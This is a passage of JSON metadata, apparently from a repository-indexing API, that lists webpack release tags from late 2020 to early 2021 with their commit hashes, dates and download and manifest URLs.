/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59: